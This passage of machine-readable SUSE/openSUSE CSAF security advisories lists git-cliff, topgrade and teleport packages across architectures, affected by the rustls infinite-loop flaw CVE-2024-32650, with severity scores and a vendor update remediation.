"git-cliff-2.2.2-bp155.2.3.1.i586", "product_id": "git-cliff-2.2.2-bp155.2.3.1.i586" } } ], "category": "architecture", "name": "i586" }, { "branches": [ { "category": "product_version", "name": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "product": { "name": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "product_id": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch" } }, { "category": "product_version", "name": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "product": { "name": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "product_id": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch" } }, { "category": "product_version", "name": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "product": { "name": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "product_id": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-bp155.2.3.1.ppc64le", "product": { "name": "git-cliff-2.2.2-bp155.2.3.1.ppc64le", "product_id": "git-cliff-2.2.2-bp155.2.3.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-bp155.2.3.1.s390x", "product": { "name": "git-cliff-2.2.2-bp155.2.3.1.s390x", "product_id": "git-cliff-2.2.2-bp155.2.3.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "git-cliff-2.2.2-bp155.2.3.1.x86_64", "product": { "name": "git-cliff-2.2.2-bp155.2.3.1.x86_64", "product_id": "git-cliff-2.2.2-bp155.2.3.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "SUSE Package Hub 15 SP5", "product": { "name": "SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5" } }, { "category": "product_name", "name": "openSUSE Leap 15.5", "product": { "name": "openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5", "product_identification_helper": { "cpe": "cpe:/o:opensuse:leap:15.5" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.aarch64 as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.aarch64" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.aarch64", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.i586 as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.i586" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.i586", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.ppc64le as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.ppc64le" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.ppc64le", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.s390x as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.s390x" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.s390x", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.x86_64 as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.x86_64" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.x86_64", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch as component of SUSE Package Hub 15 SP5", "product_id": "SUSE Package Hub 15 SP5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "SUSE Package Hub 15 SP5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.aarch64 as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.aarch64" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.aarch64", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.i586 as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.i586" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.i586", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.ppc64le as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.ppc64le" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.ppc64le", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.s390x as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.s390x" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.s390x", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-2.2.2-bp155.2.3.1.x86_64 as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.x86_64" }, "product_reference": "git-cliff-2.2.2-bp155.2.3.1.x86_64", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "openSUSE Leap 15.5" }, { "category": "default_component_of", "full_product_name": { "name": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch as component of openSUSE Leap 15.5", "product_id": "openSUSE Leap 15.5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" }, "product_reference": "git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "relates_to_product_reference": "openSUSE Leap 15.5" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.i586", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.s390x", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "SUSE Package Hub 15 SP5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.i586", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.s390x", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "openSUSE Leap 15.5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.i586", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.s390x", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "SUSE Package Hub 15 SP5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.i586", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.s390x", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "openSUSE Leap 15.5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.i586", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.s390x", "SUSE Package Hub 15 SP5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "SUSE Package Hub 15 SP5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "SUSE Package Hub 15 SP5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.aarch64", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.i586", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.ppc64le", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.s390x", "openSUSE Leap 15.5:git-cliff-2.2.2-bp155.2.3.1.x86_64", "openSUSE Leap 15.5:git-cliff-bash-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-fish-completion-2.2.2-bp155.2.3.1.noarch", "openSUSE Leap 15.5:git-cliff-zsh-completion-2.2.2-bp155.2.3.1.noarch" ] } ], "threats": [ { "category": "impact", "date": "2024-05-18T12:51:03Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13904-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "topgrade-14.0.1-2.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the topgrade-14.0.1-2.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13904", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13904-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "topgrade-14.0.1-2.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13904-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "topgrade-14.0.1-2.1.aarch64", "product": { "name": "topgrade-14.0.1-2.1.aarch64", "product_id": "topgrade-14.0.1-2.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "topgrade-14.0.1-2.1.ppc64le", "product": { "name": "topgrade-14.0.1-2.1.ppc64le", "product_id": "topgrade-14.0.1-2.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "topgrade-14.0.1-2.1.s390x", "product": { "name": "topgrade-14.0.1-2.1.s390x", "product_id": "topgrade-14.0.1-2.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "topgrade-14.0.1-2.1.x86_64", "product": { "name": "topgrade-14.0.1-2.1.x86_64", "product_id": "topgrade-14.0.1-2.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "topgrade-14.0.1-2.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:topgrade-14.0.1-2.1.aarch64" }, "product_reference": "topgrade-14.0.1-2.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "topgrade-14.0.1-2.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:topgrade-14.0.1-2.1.ppc64le" }, "product_reference": "topgrade-14.0.1-2.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "topgrade-14.0.1-2.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:topgrade-14.0.1-2.1.s390x" }, "product_reference": "topgrade-14.0.1-2.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "topgrade-14.0.1-2.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:topgrade-14.0.1-2.1.x86_64" }, "product_reference": "topgrade-14.0.1-2.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" } ] }, "vulnerabilities": [ { "cve": "CVE-2024-32650", "ids": [ { "system_name": "SUSE CVE Page", "text": "https://www.suse.com/security/cve/CVE-2024-32650" } ], "notes": [ { "category": "general", "text": "Rustls is a modern TLS library written in Rust. `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input. When using a blocking rustls server, if a client send a `close_notify` message immediately after `client_hello`, the server\u0027s `complete_io` will get in an infinite loop. This vulnerability is fixed in 0.23.5, 0.22.4, and 0.21.11.", "title": "CVE description" } ], "product_status": { "recommended": [ "openSUSE Tumbleweed:topgrade-14.0.1-2.1.aarch64", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.ppc64le", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.s390x", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.x86_64" ] }, "references": [ { "category": "external", "summary": "CVE-2024-32650", "url": "https://www.suse.com/security/cve/CVE-2024-32650" }, { "category": "external", "summary": "SUSE Bug 1223211 for CVE-2024-32650", "url": "https://bugzilla.suse.com/1223211" } ], "remediations": [ { "category": "vendor_fix", "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", "product_ids": [ "openSUSE Tumbleweed:topgrade-14.0.1-2.1.aarch64", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.ppc64le", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.s390x", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.x86_64" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "openSUSE Tumbleweed:topgrade-14.0.1-2.1.aarch64", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.ppc64le", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.s390x", "openSUSE Tumbleweed:topgrade-14.0.1-2.1.x86_64" ] } ], "threats": [ { "category": "impact", "date": "2024-06-15T00:00:00Z", "details": "important" } ], "title": "CVE-2024-32650" } ] }
opensuse-su-2024:13903-1
Vulnerability from csaf_opensuse
Notes
{ "document": { "aggregate_severity": { "namespace": "https://www.suse.com/support/security/rating/", "text": "moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright 2024 SUSE LLC. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "teleport-15.2.4-1.1 on GA media", "title": "Title of the patch" }, { "category": "description", "text": "These are all security issues fixed in the teleport-15.2.4-1.1 package on the GA media of openSUSE Tumbleweed.", "title": "Description of the patch" }, { "category": "details", "text": "openSUSE-Tumbleweed-2024-13903", "title": "Patchnames" }, { "category": "legal_disclaimer", "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", "title": "Terms of use" } ], "publisher": { "category": "vendor", "contact_details": "https://www.suse.com/support/security/contact/", "name": "SUSE Product Security Team", "namespace": "https://www.suse.com/" }, "references": [ { "category": "external", "summary": "SUSE ratings", "url": "https://www.suse.com/support/security/rating/" }, { "category": "self", "summary": "URL of this CSAF notice", "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13903-1.json" }, { "category": "self", "summary": "SUSE CVE CVE-2023-45288 page", "url": "https://www.suse.com/security/cve/CVE-2023-45288/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-29902 page", "url": "https://www.suse.com/security/cve/CVE-2024-29902/" }, { "category": "self", "summary": "SUSE CVE CVE-2024-32650 page", "url": "https://www.suse.com/security/cve/CVE-2024-32650/" } ], "title": "teleport-15.2.4-1.1 on GA media", "tracking": { "current_release_date": "2024-06-15T00:00:00Z", "generator": { "date": "2024-06-15T00:00:00Z", "engine": { "name": "cve-database.git:bin/generate-csaf.pl", "version": "1" } }, "id": "openSUSE-SU-2024:13903-1", "initial_release_date": "2024-06-15T00:00:00Z", "revision_history": [ { "date": "2024-06-15T00:00:00Z", "number": "1", "summary": "Current version" } ], "status": "final", "version": "1" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version", "name": "teleport-15.2.4-1.1.aarch64", "product": { "name": "teleport-15.2.4-1.1.aarch64", "product_id": "teleport-15.2.4-1.1.aarch64" } }, { "category": "product_version", "name": "teleport-tbot-15.2.4-1.1.aarch64", "product": { "name": "teleport-tbot-15.2.4-1.1.aarch64", "product_id": "teleport-tbot-15.2.4-1.1.aarch64" } }, { "category": "product_version", "name": "teleport-tctl-15.2.4-1.1.aarch64", "product": { "name": "teleport-tctl-15.2.4-1.1.aarch64", "product_id": "teleport-tctl-15.2.4-1.1.aarch64" } }, { "category": "product_version", "name": "teleport-tsh-15.2.4-1.1.aarch64", "product": { "name": "teleport-tsh-15.2.4-1.1.aarch64", "product_id": "teleport-tsh-15.2.4-1.1.aarch64" } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "teleport-15.2.4-1.1.ppc64le", "product": { "name": "teleport-15.2.4-1.1.ppc64le", "product_id": "teleport-15.2.4-1.1.ppc64le" } }, { "category": "product_version", "name": "teleport-tbot-15.2.4-1.1.ppc64le", "product": { "name": "teleport-tbot-15.2.4-1.1.ppc64le", "product_id": "teleport-tbot-15.2.4-1.1.ppc64le" } }, { "category": "product_version", "name": "teleport-tctl-15.2.4-1.1.ppc64le", "product": { "name": "teleport-tctl-15.2.4-1.1.ppc64le", "product_id": "teleport-tctl-15.2.4-1.1.ppc64le" } }, { "category": "product_version", "name": "teleport-tsh-15.2.4-1.1.ppc64le", "product": { "name": "teleport-tsh-15.2.4-1.1.ppc64le", "product_id": "teleport-tsh-15.2.4-1.1.ppc64le" } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "teleport-15.2.4-1.1.s390x", "product": { "name": "teleport-15.2.4-1.1.s390x", "product_id": "teleport-15.2.4-1.1.s390x" } }, { "category": "product_version", "name": "teleport-tbot-15.2.4-1.1.s390x", "product": { "name": "teleport-tbot-15.2.4-1.1.s390x", "product_id": "teleport-tbot-15.2.4-1.1.s390x" } }, { "category": "product_version", "name": "teleport-tctl-15.2.4-1.1.s390x", "product": { "name": "teleport-tctl-15.2.4-1.1.s390x", "product_id": "teleport-tctl-15.2.4-1.1.s390x" } }, { "category": "product_version", "name": "teleport-tsh-15.2.4-1.1.s390x", "product": { "name": "teleport-tsh-15.2.4-1.1.s390x", "product_id": "teleport-tsh-15.2.4-1.1.s390x" } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "teleport-15.2.4-1.1.x86_64", "product": { "name": "teleport-15.2.4-1.1.x86_64", "product_id": "teleport-15.2.4-1.1.x86_64" } }, { "category": "product_version", "name": "teleport-tbot-15.2.4-1.1.x86_64", "product": { "name": "teleport-tbot-15.2.4-1.1.x86_64", "product_id": "teleport-tbot-15.2.4-1.1.x86_64" } }, { "category": "product_version", "name": "teleport-tctl-15.2.4-1.1.x86_64", "product": { "name": "teleport-tctl-15.2.4-1.1.x86_64", "product_id": "teleport-tctl-15.2.4-1.1.x86_64" } }, { "category": "product_version", "name": "teleport-tsh-15.2.4-1.1.x86_64", "product": { "name": "teleport-tsh-15.2.4-1.1.x86_64", "product_id": "teleport-tsh-15.2.4-1.1.x86_64" } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_name", "name": "openSUSE Tumbleweed", "product": { "name": "openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed", "product_identification_helper": { "cpe": "cpe:/o:opensuse:tumbleweed" } } } ], "category": "product_family", "name": "SUSE Linux Enterprise" } ], "category": "vendor", "name": "SUSE" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "teleport-15.2.4-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-15.2.4-1.1.aarch64" }, "product_reference": "teleport-15.2.4-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-15.2.4-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-15.2.4-1.1.ppc64le" }, "product_reference": "teleport-15.2.4-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-15.2.4-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-15.2.4-1.1.s390x" }, "product_reference": "teleport-15.2.4-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-15.2.4-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-15.2.4-1.1.x86_64" }, "product_reference": "teleport-15.2.4-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tbot-15.2.4-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.aarch64" }, "product_reference": "teleport-tbot-15.2.4-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tbot-15.2.4-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.ppc64le" }, "product_reference": "teleport-tbot-15.2.4-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tbot-15.2.4-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.s390x" }, "product_reference": "teleport-tbot-15.2.4-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tbot-15.2.4-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tbot-15.2.4-1.1.x86_64" }, "product_reference": "teleport-tbot-15.2.4-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tctl-15.2.4-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.aarch64" }, "product_reference": "teleport-tctl-15.2.4-1.1.aarch64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tctl-15.2.4-1.1.ppc64le as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.ppc64le" }, "product_reference": "teleport-tctl-15.2.4-1.1.ppc64le", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tctl-15.2.4-1.1.s390x as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.s390x" }, "product_reference": "teleport-tctl-15.2.4-1.1.s390x", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tctl-15.2.4-1.1.x86_64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tctl-15.2.4-1.1.x86_64" }, "product_reference": "teleport-tctl-15.2.4-1.1.x86_64", "relates_to_product_reference": "openSUSE Tumbleweed" }, { "category": "default_component_of", "full_product_name": { "name": "teleport-tsh-15.2.4-1.1.aarch64 as component of openSUSE Tumbleweed", "product_id": "openSUSE Tumbleweed:teleport-tsh-15.2.4-1.1.aarch64" }, "product_reference": "teleport-tsh-15.2.4-1.1.aarch64", "relates_to_product_reference": "openSUSE 